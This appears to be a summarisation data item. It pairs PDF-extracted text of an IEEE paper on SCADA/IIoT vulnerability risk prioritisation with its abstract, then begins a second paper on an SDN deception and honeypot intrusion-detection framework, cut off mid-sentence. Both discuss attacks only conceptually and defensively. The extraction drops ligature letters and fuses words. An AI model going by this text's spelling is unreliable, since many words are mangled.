CWE-200: information exposure is not listed under the top ve CWEs for exploitdensity. This is likely because of the nature of the CWE. Information exposure is the act of an operator providing cre- dentials to an unauthorized actor. It is a managerial exploit rather than a technical one that can be found in a public database, hence the reason it is not covered under top CWEsfor exploit density. Because of this, CWE-200 should still be considered a main concern for SCADA systems. To provide insight for security professionals into SCADA- speci c risks, a comparison was made to non-SCADA vul- nerability types and their associated exploits. The intention is Fig. 1. SCADA versus non-SCADA vulnerability density. not to prove that SCADA is entirely different from IT sys-tem security, but to inform operators of nuances of SCADA systems. Based on a side-by-side analysis of the density of CWEs, it is clear that SCADA security professionals should be look- ing for Buffer Over ow vulnerabilities, compared with non-SCADA which is dominated by Cross Site Scripting. Fig. 1 illustrates these vulnerability density s comparing SCADA and non-SCADA. A comparison of SCADA versus non-SCADA CWE exploit density reveals that SCADA operators should be most con-cerned with Buffer Over ow vulnerabilities (as they have the greatest risk of having exploits associated with them). This can be compared to non-SCADA systems where it seems thatthe predominant CWE to have an exploit associated with it is SQL Injection. The signi cance of these SCADA versus non-SCADA dif- ferences were evaluated by applying a cosine similarity test on the Web-scraped data. Cosine similarity measures how similar two nonzero vectors are to each other. The closer the cosinesimilarity value is to 1 indicates a 0 separation between the two vectors (meaning the data sets are very similar). If the cosine similarity is closer to 0, it indicates that there is a 90 separation between the two vectors indicating the data sets are polarized. For purposes of this paper, we will set a threshold of a cosine similarity of greater than 0.5 (indicating a vectorangle of 45 or less) is considered to be similar data sets and less than 0.5 as dissimilar data sets. The cosine similarity of the vulnerability density of SCADA compared with non-SCADA was 0.860. This indicates that the overall distribution of the vulnerability types of SCADAversus non-SCADA are very similar and differences are not signi cant. However, the cosine similarity of the exploit den- sity per CWE of SCADA compared with non-SCADA was0.408. Considering the threshold set, we can af rm that the exploit landscape is different for SCADA versus non-SCADA FALCO et al. : IIoT CYBERSECURITY RISK MODELING FOR SCADA SYSTEMS 4491 TABLE IV NON-SCADA E XPLOITS VERSUS CWE F REQUENCY , CVSS, IMPACT SCORE ,AND EXPLOITABILITY SCORE in a signi cant way. This signi cance magni es the impor- tance of the CWE exploit density s role in SCADA-speci c prioritization. This shows that despite consistent vulnerabil-ity distributions across SCADA and non-SCADA systems, attackers choose to create exploits for distinctly different vul- nerabilities for SCADA systems compared to the exploits theycreate for non-SCADA systems. In addition to understanding the value of vulnerability and exploit density, the importance of CVSS, impact score, andexploitability score to evaluating risk was sought for SCADA systems considering Allodi and Massacci [ 2] determined these scores were not strong indicators of exploit for IT systems.To do this, regression analyses were performed on these vari- ables to determine the likelihood that an exploit exists for a given CWE. Before investigating the SCADA relationship of exploit den- sity and the First.org risk scores, Allodi and Massacci s [ 2] ndings were veri ed by regressing the number of non- SCADA exploits with non-SCADA CWE frequency, CVSS, exploitability, and impact scores. Non-SCADA scores byFirst.org were indeed found to have no correlation with exploit density with an adjusted R 2value of 0.098. The results of the test can be found in Table IV. Moving forward to understand SCADA s relationship with these scores, a test was then performed to understand the rela- tionship between number of SCADA exploits and the SCADACVSS scores. The hypothesis was that the higher the aver- age CVSS score was for a set of CVEs in a CWE, the more likely there would be exploits associated with the CWE. As areminder, CVSS scores are metrics of risk evaluated based on factors including impact and exploitability scores for a CVE. However, the CVSS score is not an average or sum ofimpact and exploitability scores. First.org provides the equa- tions for calculating the seemingly complex CVSS scores on their website and it is replicated on NIST s NVD [ 26]. When conducting a linear regression of CVSS scores on exploits, it was surprising to nd no correlation between CVSS scores and exploits with an adjusted R 2value of 0.074. This indicated that in our SCADA prioritization schema, CVSS scores should not be a factor in determining which CWEsshould be prioritized. Next, a regression was run to determine if the number of vulnerabilities per CWE, the average impact score for CVEsrelated to a respective CWE and the average exploitability score for CVEs related to a respective CWE were correlatedTABLE V SCADA E XPLOITS VERSUS CWE F REQUENCY ,IMPACT SCORE , AND EXPLOITABILITY SCORE with a CWE having exploits. Similar to the assumption with the CVSS scores relationship with the presence of exploits, the hypothesis was that a high number of vulnerabilities and high impact and exploitability scores were correlated withthe existence of an exploit for a given CWE. In this case, the multiple regression model corroborated the hypothesis with an adjusted R 2value of 0.924 showing a strong rela- tionship between the presence of an exploit and the number of vulnerabilities for the given CWE, the average impact score and exploitability score. The results of the analysiscan be found in Table V. These results were surprising as they indicate that there is something unique about SCADA CWE frequency and exploitability and impact scores rela-tionship with exploit density that is not true of IT systems as found by Allodi and Massacci [ 2]. Further, this indicates that in First.org s complex equation that converts impact and exploitability scores to CVSS scores, the correlation with the presence of an exploit for a given CWE is lost. This could sug-gest that the CVSS score is a awed indicator of risk whereas the exploitability and impact scores are not (assuming risk can be accessed via the presence of an exploit as per the suggestionof this paper). To further validate the assertion that CVSS scores do not correlate with the presence of an exploit, other multiple regres-sions were run regressing exploits on variations of CVSS scores and other variables. All of these regressions consis- tently showed a weak relationship between exploits and CVSSscores, even when coupling CVSS scores with exploitability and impact scores. Based on this analysis, the magnitude of exploitability and impact scores for a given CWE are important. The top ten CWEs for impact and exploitability scores can be found in rank order in Table VI. It is interesting to note that while the top ten CWEs for impact and exploitability are not the same rank, all top impact score CWEs are also found in the topexploitability score CWE list and vice versa. C. Scoring To develop a SCADA prioritization schema, the above anal- ysis was used to evaluate which variables are most relevant todetermining the SCADA IIoT risk. The variables of CWE den- sity, CWE exploit density, and impact and exploitability scores were ultimately used. Additional variables can be includedfor a prioritization schema if data is available and the data is found to correlate with exploit density. While there are many 4492 IEEE INTERNET OF THINGS JOURNAL, VOL. 5, NO. 6, DECEMBER 2018 TABLE VI TOPTENSCADA CWE SB Y IMPACT AND EXPLOITABILITY SCORES Fig. 2. Prioritization schema steps. options to determine how to score each variable for the priori- tization order, for purposes of this paper, a rudimentary system was selected intentionally for transparency. More sophisticatedweight-based prioritization schemes can be created and cus- tomized for various organizations. The purpose of this paper is not necessarily to generate the correct or ultimate prioriti-zation order for SCADA system vulnerabilities, rather it is to establish a framework for how a data-driven study can be used to develop customized SCADA risk prioritization schemes.Future work is encouraged to address how to weight each variable for the prioritization schema. Point values were assigned based on the ranked position of the CWE in each category. Each category (i.e., CWE density, CWE exploit density, etc.) were weighted equally. For pur- poses of this analysis, the top ve CWEs from each categorywere ranked where the top ranked CWE receives a point value of 5 and the fth CWE in the ranking receives a value of 1. The top ve ranked CWEs can be found for all four cat- egories in Table VIIand the total allocated points per CWE can be found in Table VIII.F i g . 2represents the steps required to generate the prioritization schema including the inputs and outputs of the model. This prioritization schema for SCADA vulnerabilities log- ically makes sense based on the characteristics of SCADA operations. A closer look at the top three prioritized SCADA vulnerability types helps illustrate this. Buffer over ows arede ned as a vulnerability where software can read or write to a memory location that is outside the intended boundary of theTABLE VII TOPFIVERANKED CWE SPERCATEGORY TABLE VIII TOTAL SCORES FOR TOP-RANKED CWE S memory buffer. It is not surprising that buffer over ows war- rant the highest priority for SCADA vulnerabilities as buffer over ows are inherent in older, low-level programming lan-guages such as C which is common to SCADA. Further, SCADA devices are rarely rebooted due to their constant operating requirements. Systems that have not been rebootedfor years will accumulate memory fragmentation. This makes devices substantially more vulnerable to buffer over ow vul- nerabilities [ 7]. Improper input validation is when software does not check input which enables an attacker to enter values that could cause control ow changes that are not expected by an operator. Considering one of the key differentiators of ICS versus IT systems is that ICSs are deterministic, this vulner- ability is clearly a threat [ 9]. SCADA systems require low jitter and any disruption of the deterministic processes such as an attack exploiting the vulnerability class of improper input validation would severely impact operations. Finally,information exposure is the disclosure of information to an unauthorized person. This vulnerability type is also logical FALCO et al. : IIoT CYBERSECURITY RISK MODELING FOR SCADA SYSTEMS 4493 for SCADA considering the prevalence of default usernames and passwords used across systems [ 7]. Because default user- names and passwords are frequently used, attackers can easily obtain this information from an instruction manual or from a vendor discussion forum. Also, information exposure asa prioritized exploit is logical considering the prevalence of phishing attacks used to collect credentials from critical infras- tructure operators. This was seen for the Ukrainian electricgrid cyberattack and UglyGorilla s cyber espionage program against 23 U.S. natural gas pipelines [ 1], [27]. While information exposure is a borderline priority with path traversal, it is important to remember that information exposure lacked technical exploits publicly available in the databases searched because it is more of a managerial exploit than technical. Therefore, it was not appropriately captured in the exploit density data set, and indeed belongs at the topof the list. IV . R ESEARCH IMPLICATIONS A. Operator Implications This paper, while niche to a subsector of IIoT, can have considerable impact for urban critical infrastructure secu- rity. Our ndings indicate that there is a strong relationship between First.org risk metrics and exploit density, speci callyfor SCADA systems. There are three groups of critical urban infrastructure security experts that can bene t from this insight chief information security of cers (CISOs), security operationscenter (SOC) analysts, and system architects. CISOs who oversee all security operations of an organiza- tion generally have the dif cult responsibility to develop and manage programs to secure the organization at scale. Because of our ndings, CISOs can streamline their programs for secur-ing SCADA systems. Rather than establishing programs meant to help create metrics that can be used to assess the risk of various IIoT systems, CISOs could instead refer to First.org smetrics of exploitability and impact to evaluate IIoT risk of exploit. There is no longer a need to start from scratch devel- oping metrics considering we demonstrated that exploitabilityand impact metrics are valid predictors of exploit risk for SCADA systems. SOC analysts are another group of security experts that can bene t from our ndings. SOC analysts are often responsi- ble for monitoring and xing security risks as they occur. Instead of reactively seeking out security threats to address,our risk prioritization schema will help analysts proactively seek out which IIoT systems are likely to be attacked. SOC analysts can cross-check IIoT devices with CVEs and CWEsthat we identi ed to be most exploited to arrive at their prioritized device list. System architects responsible for selecting components for urban critical infrastructure should use our ndings to care- fully select systems based on their vulnerability pro le. Whilewe acknowledge most urban critical infrastructure IIoT con- sists of legacy devices that are not often replaced, when new devices are procured, our risk prioritization schema can beused to assess which SCADA systems should be installed. IIoT devices with the most vulnerabilities in the categorieswe discover to be of highest risk of exploit should be avoided. B. Technical Design Implications Future SCADA IIoT systems should be designed and developed with the intent to design out the prioritized vul- nerabilities indicated in this paper. Addressing the prioritized vulnerabilities in the design phase could help reduce the num-ber of future attacks against this class of IIoT. Based on recommendations of the top three prioritized vulnerabilities of buffer over ows, improper input validation, and informa-tion exposure, we can propose technical design strategies to help avoid these vulnerabilities. Buffer over ows are prevalent in operating environments that are programmed in C. The language provides direct mem- ory access, which can be used to help reduce the device senergy consumption. Energy ef ciency is important for the cost ef ciency of SCADA systems especially considering their highly distributed nature in locations where resource availabil-ity might be limited. Further, C can be very memory ef cient, which is also valuable for small devices required for urban critical infrastructure. Despite these bene ts of C, the bufferover ow vulnerabilities that result from coding mistakes are a considerable downside. This prioritized vulnerability can be designed out by using a memory safe programming lan-guage when developing future SCADA systems. One memory safe language that is also memory ef cient is Rust [ 28]. If future IIoT systems can be programmed in Rust, buffer over- ows will no longer be an issue therefore removing this attack vector for IIoT SCADA systems. SCADA design traditionally focuses on detecting and clas- sifying control conditions that enables accurate monitoring in various states [ 29]. With focus on the functional opera- tion of the SCADA system, proper input to the system is assumed and not accounted for in the design process. With increased skepticism of IIoT device inputs based on recentattacks, and the associated vulnerabilities involving improper input, SCADA designers must take measures to validate input. Design recommendations that could reduce the number ofimproper input validation vulnerabilities in systems include using an input validation framework such as Struts or OWASP ESAPI Validation API when creating the system or by iden-tifying all possible areas where an attacker could input data and employ a whitelist strategy [ 30]. Frameworks like Struts help to guide software development so that there are fewvalidation issues. A whitelisting strategy entails rejecting all inputs other than the few that are actually appropriate for the design speci cations of the system s purpose. The whitelistshould account for all input properties ranging from length to syntax. Information exposure may perhaps be the most challeng- ing vulnerability to design out of a SCADA system. This is because many information exposure attacks happen as afunction of the human element either by error or intention- ally. A potentially effective mechanism to mitigate the damage caused by information exposure is to compartmentalize datasystems [ 31]. Designing SCADA IIoT to be compartmental- ized can limit the data leak or attack to only the compartment 4494 IEEE INTERNET OF THINGS JOURNAL, VOL. 5, NO. 6, DECEMBER 2018 that was breached. If a centralized data store for SCADA IIoT is used, compromised access to the central hub will leave alldata vulnerable. These proposed SCADA IIoT technical design strategies may help to reduce the prevalence and risk of the top vulnerabilities identi ed in this paper. Each SCADA designerwill need to evaluate if these strategies can be used based on their speci c technology requirements as not all design mit- igation techniques will necessarily be appropriate for everyIIoT system. V. C ONCLUSION Unique contributions of this paper are signi cant for secu- rity researchers investigating SCADA systems, SCADA IIoT designers and critical infrastructure operators working with IIoT. The research reveals that SCADA systems as a soft- ware subclass were found to have exploits that target adistinct set of vulnerabilities compared with non-SCADA sys- tems. This indicates that the risk pro le for SCADA systems varies compared with that of non-SCADA. The study alsoidenti es highly correlated relationships between First.org vul- nerability risk metrics and the density of SCADA exploits. These ndings could encourage security researchers to recon-sider their assertions that exploitability and impact scores are inaccurate predictors for the risk of exploit. Researchers should repeat these studies on risk metrics relationship withexploits speci cally for subsets of software as was done for SCADA. Finally, ndings suggest that security researchers, SCADA IIoT designers and SCADA operators should focuson a core set of vulnerability types for SCADA systems. Considering the unique requirements of SCADA systems and the associated challenges with vulnerability patching, alter- native security strategies concerning prioritized vulnerabilities should be investigated. The prioritization framework providedcan be customized based on organizational requirements and parameters. Urban critical infrastructure operators can use the prioritization in parallel with NIST s more comprehensivecybersecurity framework to understand their SCADA risk. Because the SCADA prioritization schema is based on empirical, data-driven ndings, it will need to be updated con-tinuously as new exploits are published. If a series of new SCADA exploits are released that target a speci c vulnera- bility class, the prioritization schema will be outdated. It isrecommended that this prioritization is updated annually as was the CWE/SANS top 25 list. There are several future research opportunities related to this paper. CVSS and exploitability and impact scores are being transitioned from version 2 to version 3 which entails new scores that are more speci c. Once this new scoringmethodology has been completed and vetted for accuracy, this paper should be repeated with updated data so that the exploitability and impact scores can be normalized appropri- ately. Testing additional characteristics of vulnerabilities as variables to determine their association with the risk of exploitcould be included in future work. As previously indicated, other sources of exploits can be compiled from repositories such as Github or sources that may reference managerialrelated exploits rather than technical ones to better capture the exploit potential of CWEs such as information exposure.Future research could also investigate the scoring mecha- nisms used for the prioritization schema, which can be furthercustomized through weightings and new point allocation sys- tems. Finally, further studies should investigate opportunities to incorporate this SCADA prioritization approach to the exist-ing NIST framework to provide a data-driven approach to evaluating system risk. This should accompany IIoT security policy research intended to encourage a robust, quantitativeapproach for evaluating urban critical infrastructure risk. A CKNOWLEDGMENT The authors would like to thank A. Sanchez, S. Madnick, L. Susskind, D. Serpanos, A. Kam, H. Okhravi,A. Viswanathan, R. Oppliger, V . Roth, L. Uzeda, and R. Yahalom for ideas, edits, and contributions to this paper. R EFERENCES [1] Analysis of the cyber attack on the Ukrainian power grid, defense use case, Electricity Inf. Sharing Anal. Center, Washington, DC, USA, Rep., 2016. [2] L. Allodi and F. Massacci, A preliminary analysis of vulnerabil- ity scores for attacks in wild: The ekits and sym datasets, in Proc. ACM Workshop Build. Anal. Datasets Gather. Exp. Returns Security(BADGERS) , Raleigh, NC, USA, 2012, pp. 17 24. [Online]. Available: http://doi.acm.org/10.1145/2382416.2382427 [3] K. Nayak, D. Marino, P. Efstathopoulos, and T. Dumitra s, Some vul- nerabilities are different than others, in Research in Attacks, Intrusions and Defenses , A. Stavrou, H. Bos, and G. Portokalidis, Eds. Cham, Switzerland: Springer Int., 2014, pp. 426 446. [4] Dimensional Research. (Mar. 2016). Dimensional Research. Trends in Security Framework Adoption: A Survey of it and Security Professionals . [Online]. Available: https://static.tenable.com/marketing/tenable-csf-report.pdf [5] T. H. Grubesic and T. C. Matisziw, A typological framework for catego- rizing infrastructure vulnerability, Geo J. , vol. 78, no. 2, pp. 287 301, 2013. [6] C. Pak, Typologies of Attacks and Vulnerabilities Related to the National Critical Infrastructure . London U.K.: Palgrave Macmillan, 2015, pp. 169 180, doi: 10.1057/9781137455550_11 . [7] B. Zhu, A. Joseph, and S. Sastry, A taxonomy of cyber attacks on SCADA systems, in Proc. 4th Int. Conf. Internet Things Int. Conf. Cyber Phys. Soc. Comput. , Dalian, China, Oct. 2011, pp. 380 388. [8] J. Slay and M. Miller, Lessons learned from the Maroochy water breach, in Critical Infrastructure Protection , E. Goetz and S. Shenoi, Eds. Boston, MA, USA: Springer, 2008, pp. 73 82. [9] B. Galloway and G. P. Hancke, Introduction to industrial control net- works, IEEE Commun. Surveys Tuts. , vol. 15, no. 2, pp. 860 880, 2nd Quart., 2013. [10] J. Weiss, Protecting Industrial Control Systems from Electronic Threats . New York, NY , USA: Momentum Press, 2010. [11] K. A. Stouffer, J. Falco, and K. Scarfone, Guide to industrial control systems (ICS) security, NIST Special Publ. , vol. 800, no. 82, p. 16, 2011. [12] P. A. S. Ralston, J. H. Graham, and J. L. Hieb, Cyber security risk assessment for SCADA and DCS networks, ISA Trans. , vol. 46, no. 4, pp. 583 594, 2007. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0019057807000754 [13] B. Obama, Executive Order 13636: Improving Critical Infrastructure Cybersecurity , White House, Washington, DC, USA, 2013. [14] W. Miron and K. Muita, Cybersecurity capability maturity models for providers of critical infrastructure, Technol. Innov. Manag. Rev. ,v o l .4 , pp. 33 39, Oct. 2014. [Online]. Available: http://timreview.ca/article/837 [15] Z. Zhang, Environmental review & case study: NERC s cybersecu- rity standards for the electric grid: Ful lling its reliability day job andmoonlighting as a cybersecurity model, Environ. Pract. , vol. 13, no. 3, pp. 250 264, 2011. doi: 10.1017/S1466046611000275 . [16] Mandatory reliability standards for critical infrastructure protection, Federal Energy Regul. Comm., Washington, DC, USA, Rep. RM06-22- 008, Jan. 2008. FALCO et al. : IIoT CYBERSECURITY RISK MODELING FOR SCADA SYSTEMS 4495 [17] R. Ellis, Regulating cybersecurity: Institutional learning or a les- son in futility? IEEE Security Privacy , vol. 12, no. 6, pp. 48 54, Nov./Dec. 2014. [18] MITRE, DHS. Common Weakness Enumeration National Vulnerability Database 2016 . Accessed: Oct. 31, 2016. [Online]. Available: https://cwe.mitre.org/index.html [19] MITRE. 2011 CWE/SANS Top 25 Most Dangerous Software Errors . Accessed: Nov. 12, 2016. [Online]. Available: http://cwe.mitre.org/ top25/ [20] M. Luallen, Breaches on the Rise in Control Systems: A SANS Survey , SANS Inst., North Bethesda, MD, USA, Apr. 2014. [21] A. Sarwate, Scada Security: Why Is it so Hard? Blackhat, San Francisco, CA, USA, Nov. 2011. [22] Electronic Database. Offensive Security Exploit Database Archive . Accessed: Oct. 31, 2016. [Online]. Available: https://www.exploit- db.com/ [23] MITRE. CVE Security Vulnerability Database. Security Vulnerabilities, Exploits,
Summary:
Urban critical infrastructure such as electric grids, water networks, and transportation systems are prime targets forcyberattacks. These systems are composed of connected devices which we call the Industrial Internet of Things (IIoT). An attack on urban critical infrastructure IIoT would cause considerabledisruption to society. Supervisory control and data acquisition(SCADA) systems are typically used to control IIoT for urbancritical infrastructure. Despite the clear need to understand thecyber risk to urban critical infrastructure, there is no data-drivenmodel for evaluating SCADA software risk for IIoT devices. Inthis paper, we compare non-SCADA and SCADA systems andestablish, using cosine similarity tests, that SCADA as a soft-ware subclass holds unique risk attributes for IIoT. We thendisprove the commonly accepted notion that the common vulner-ability scoring system risk metrics of exploitability and impactare not correlated with attack for the SCADA subclass of soft-ware. A series of statistical models are developed to identifySCADA risk metrics that can be used to evaluate the risk thata SCADA-related vulnerability is exploited. Based on our nd-ings, we build a customizable SCADA risk prioritization schemathat can be used by the security community to better under-stand SCADA-speci c risk. Considering the distinct propertiesof SCADA systems, a data-driven prioritization schema willhelp researchers identify security gaps speci c to this softwaresubclass that is essential to our society s operations.
|
Summarize:
Keywords cyber deception, SDN, software defined networking, intrusion detection, honeypot I. INTRODUCTION Witnessing the explosion of the Internet of Things (IoTs) devices, network management encounters the problems of lacking flexibility, scalability, and automation. Under conventional network architecture, the performance of the network is downgraded if there is fluctuation in the presence and communication among many heterogeneous devices. To this end, Software Defined Networking (SDN) has been emerging with outstanding features to effectively manage a diversity of devices for edge-cloud computing by the centralized controller [1]. It enables the network administrator to observe the global view of the entire topology, automatically deploy a virtual network function, also promptly instruct a new security policy into IoT devices [2]. Clearly, SDN is a potential network paradigm for security orchestration in a large-scale network. When flocking into security sensors, the network traffic can be processed in a flexible way by installed rules in OpenFlow switches to intercept malicious actions. In The Art of War [3] - the most important and most famous military treatise in Asia for the last two thousand years, Sun Tzu observes, All warfare is based on deception. Hence, when we are able to attack, we must seem unable; when using our forces, we must appear inactive. Nowadays, 2500 years later since then, deception can be still efficiently applied in the war on cybercrime in addition to modern military operation. Deception is a great way to gain information about the opponent [4]. Though there are many security approaches like firewalls, intrusion detection system for recognizing and preventing rogue actors from accessing the critical resources, they are still not active defense solutions. Instead of waiting for attackers to intrude into the network system and then promptly block them, cyber deception technology, known as a next generation of honeypot, is adopted to pretend as real network resources to lure hackers. By this proactive strategy, cyber traps and decoy systems are deployed through some locations in the network to consume the effort and time of attackers. Besides, Moving Target Defense (MTD) known as an active defense principle keeps changing the attack surface of a protected asset through a dynamic shifting strategy, which can be handled by the administrator. In this way, the attack surface exposed to attackers appears chaotic and unstable by actively changing network configurations over time [5]. In different use cases, MTD can be applied to various assets attributes consisting of IP address, running services, protocol, topology, or port number, etc. [6]. Moreover, to mitigate the harm of attacks, IDS is considered as an essential means in the first round of defender system. By collecting malicious traces from various network segments, devices or security sensors, these systems do not only allow to recognize and disrupt the incoming actions from attackers, but also provide the capability of intrusion detection for the likely malicious traffic in the future. This is achieved by using machine learning (ML) for anomaly detection in addition to the signature-based approach. The complement of these two approaches can give a more effective defender system for the network which always suffers from sophisticated attacks by skilled hackers. Unfortunately, such ML-based IDSs need to be trained with a large volume of diverse attack records which are labeled from the analysis phase by security experts. The labeling task of the dataset re quires human effort and time 272022 21st International Symposium on Communications and Informa tion Technologies 978-1-6654-9851-7/22/$31.00 2022 IEEE2022 21st International Symposium on Communications and Information Technologies (ISCIT) | 978-1-6654-9851-7/22/$31.00 2022 IEEE | DOI: 10.1109/ISCIT55906.2022.9931208 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. which is nearly impossible in the context of big data. The more and more sophisticated attacks emerge, the more burdened the task of gathering attack trails is. Additionally, some attack types are difficult to perform in the real-life scenario at the local network for collecting purpose due to the limitation of resources. Therefore, instead of blocking attackers rightly after they put a step into networks, we can continuously observe and extract their behaviors for training ML-based IDS. These decoy systems and cyber traps are free sources for defe nder systems to understand the hackers wher eas still making the enemy stuck in the matrix of vulnerabilities of fake assets with time- consuming and great efforts fo r the reconnaissance phase. This paper integrates the benefits of network programmability of SDN, cyber deception, MTD and deep transfer learning-based IDS to establish an active defense strategy for SDN. Our approach can create a more chaotic information and deceptive environment to mitigate the exposure of critical data in protected targets from attackers. Simultaneously, the malicious action of hackers gathered in deceptive objects can be used as high-quality and free-cost attack patterns for real-world attack detection. We organize the remainder of this paper as follows. Section II introduces the overview of deception technology and its support for IDS. The related works are also mentioned in this part. Section III outlines the overview of our approach, followed by the detailed architecture of the deception-enhanced framework for intrusion detection. We present the implementation and experiment results in Section IV . Finally, Section V concludes the paper with effective outcomes and discusses future directions. II. R ELATED LITERATURE Over the last decades, the concepts of deception witnessed rising popularity in information security with the concept of honeypot for deceiving would-be hackers into a trap. Cyber deception has been tremendously receiving the attention of researchers from academics an d industry [4]. It brings efficiency in early detecting attacks and gives more obstacles for attackers during their reconnaissance phase. In the work of He Wang [7], they used SDN for building a honeypot system to simulate network topologies and migrate traffic of attacks. Attackers are attracted to realis tic networks simulated by the SDN controller and attacks are redirected to honeypots. Honeypots are responsible for capturing the traffic of attacks for further analysis. Meanwhil e, Decepti-SCADA [8] used Docker to build honeypots to isolate the real system. This makes the honeypot system minimize the compromised ability and disqualify dependencies of cross-platform. This framework also developed modular architecture enabling adding new decoys easily. The web interface was built to improve users accessibility. Besides, Dahbul et al. [9] presented fingerprinting techniques of attackers to identify honeypots. By using several system configurations and customized scripts, they could improve the deceptive ability of honeypots to prevent honeypot detection from attackers. Howeve r, this research only focused on the layers of 3, 4, and 7. With the explosion of IoT, DDoS is the threat that deserves attention. IoT devices can exist exploitable vulnerabilities that are possible to be exploited to carry out DDoS attacks. Xupeng Luo et al. [10] proposed an SD N-based architecture of moving target defense to change attack targets. It helped to defend threats of scanning and mitigate DDoS attacks. A new attack was shown by Miao Du and Kun Wang [11] that could detect honeypots for disabling the protection of a system. To protect SDN from anti-honeypot attacks, they present a pseudo-honeypot strategy in SDN to face DDoS attacks in the IoT environment. The proposed strategy enables network administrators to hide network assets from scanners and defend against DDoS attacks in IoT. M eanwhile, Mengmeng et al. [12] combined cyber deception and moving target defense (MTD) to propose an intrusion prevention technique. SD-IoT networks implementing this technique can extend the lifetime of the system, maintain the availability of services, and increase tolerance to complex attacks. Additionally, Aris et al. [13] also formulated a proactive defense mechanism using MTD for Cyber-Physical Systems (CPS ). In their case, MTD can continuously alter the parameters of the system, while hindering the ability of adversaries to conduct successful reconnaissance to the network system. However, their mechanism lacks the flexibility in maximizing unpredictability and uncertainty due to the absence of SDN. Applying ML in IDS is a tren d in current research topics. Taking advantage of cyber-attacks as free labors to gather data for training machine learning based IDSs is a proactive defense suggested by Frederico Araujo et al. [14]. Adversarial interactions are selectively lengthened to maximize the collection of threat intelligence. More specifics, they introduced an interactive approach to improve web intrusion detection systems, called DeepDig. With network traffic and traces collected in traps, it built models of legitimate and malicious behaviors. This approach can enhance the automated feature extraction for IDS without additional developing effort. Motivated by this, our work designs the scheme of adaptive honeypot deployment and MTD in SDN to deceive attackers spending their time and resources on decoy systems. The leverage of SDN s programmability in our approach can help to enforce a more flexible deployment strategy of cyber traps corresponding to different network conditions than Decepti-SCADA and DeepDig. Also, the network flows extracted from the mirroring server can help to release the pressure of labeling attack data for training DL-based IDS models. Deep transfer learning for network flow-based IDS is another distinguished aspect of our work in comparison with DeepDig. III. M ETHODOLOGY This section gives the overview of the deception framework for IDS, named FoolYE , deployed to not only lure attackers targeting decoys for mitigating attack impacts but also leverage the free source of attack trails in detecting malicious attempts. As shown in Fig. 1 , the proposed architecture of the deception strategy associating intrusion detection is programmable by the essence of SDN. The controller can remotely observe network statistics and give relevant responses to the reconnaissance attacks. Any harmful or suspicious actions can be redirected to decoy target through instructing flow rules into OpenFlow switches. Specifically, many types of honeypots are prepared as a deception template in the Trap Inventory for easily deploying in network segments. 28 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. Meanwhile, Security Orchestrator plays a role of opting the type of honeypot to be installed. It also determines the method of establishing cyber traps to mislead attackers into believing that the collected information from the scanning phase is real. Eventually, the attack trails or malicious action logged in the honeypot or decoy is gathered and utilized as a free source for maintaining the up-to-date intelligence in intrusion detection system (IDS). IDS is an engine implementing machine learning algorithms for detecting cyber threats. Extractor produces network flow features from data gathered from SDN controller and honeypots, then sends them to ML-based IDS for analysis. To prevent network reconnaissance from inside or outside, MTD is a plugin of the SDN controller, it is responsible for mapping a real IP address of a host to a virtual IP address. The virtual IP address is mutated in a period according to the idea of CONCEAL [15]. Fig. 1. FoolYE A deception-enhanced IDS in SDN-enabled network. Algorithm 1 gives the workflow of honeypot deployment of FoolYE, a flexible deception-supported IDS framework, aiming to create significant confusion in discovering and targeting cyber assets in SDN-aware networks. A. Intrusion Detection Engine Playing an important role in recognizing malicious traffic flow in the network, the intrusion detection engine leverages the ML algorithms to classify new incoming flows flocking into the operational network. Th is engine requires a massive number of traffic flow records to train before it can predict the attack label. These records can come from public datasets, or own-built honeypot systems deployed in the network. Regard to DL models used in ML-based IDS, we utilize two state-of -the-art models in image recognition, named ResNet50 and DenseNet161 on ImageNet dataset. The deep transfer learning strategy is ad opted in both models to reduce the training time of neural networks, as depicted in Fig. 2 . We use feature extraction strategy as a transfer learning technique to leverage the model knowledge of previous domain in a new one. The last fully connected (FC) layer of models is replaced with the layer including 2 classes (normal and abnormal) instead of 1000 classes in ImageNet. The hyperparameters of fully connected layers in ResNet50 and DenseNet161 are kept unchanged during the training phase. Following that, the training phase is conducted by using random hyperparameters on the new last layer to update them according to the intrusion detection dataset. Fig. 2. Training detector by deep transfer learning on ResNet50 model. Based on recommendation of a flow-based IDS research [16] on CICIDS2017 dataset [17] , we choose 7 of 80 flow features in CICIDS2018 dataset [18] for ML-based IDS because these SDN flow features can be easily obtained by controller while sharing the same descriptions with the CICIDS2017 dataset [17]. These features are destination port, flow duration, fwd packet length mean, flow bytes/s, flow packet/s, flow IAT mean, fwd packets/s. Labels of the dataset are converted into two types: value 0 is benign and 1 is likely an attack. Values of the flow features in the dataset have several types as integer, st ring, float. The min-max normalization is performed to normalize them into the domain of [0, 1]. A new value ( xnew ) converted into an integer by formula 2 xnew*10. After that, the task of converting network records into images is conducted to feed into the input of two mentioned DL models. To achieve this, we utilize the method proposed by Zhipeng Li [19] to transform each integer value to a corresponding binary value. This method ensures that all values only fall into the range from 0 to 255 to be mapped into an image pixel. Besides, the output of the method from [19] on each feature value is a binary number with 8 bits. Next, 8-bit elements are concatenated into a single bit array with the length Algorithm 1 Trap deployment workflow of FoolYE Input: inventory : list of honeypot images in Trap Inventory templates : honeypot image to establish mtdIPPool : a list of fake IPs for moving target defense deployMode: the mode of deploying honeypots period: period to change traps Output: traps: list of honeypots is deployed 1: Initialize timer 2: # Initialize traps according to the deployMode traps inventory .create (templates ) 3: if (timer mod period == 0) 4: traps IP mutation on topology ( mtdIPPool ) 5: if (deployMode == MOVING) 6: # Change traps to other types from inventory and templates traps changeType( inventory,templates) 7: return traps 29 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. of larray. To simplify the process of image conversion, we aim to get a square RGB image to represent for a flow-based IDS. Relied on the characteristics of a color image, the larray value can be used to determine the size s of this target image, as in (1). larray=3 s2 (1) Moreover, in case s receives a decimal value, 0 bits will be added to the end of the bit array to make s come to an integer value. This new array is then di vided into 3 sub-arrays with the same length. The length of s2 allows them to be transformed to corresponding 2-dimension arrays as color layers in RGB image. B. Cyber Deception, Trap Inventory and Security Orchestrator One of the main objectives for cyber deception is to cover the identity of the cyber assets. Thus, in FoolYE, we use various honeypots to take attacker far away from critical resources 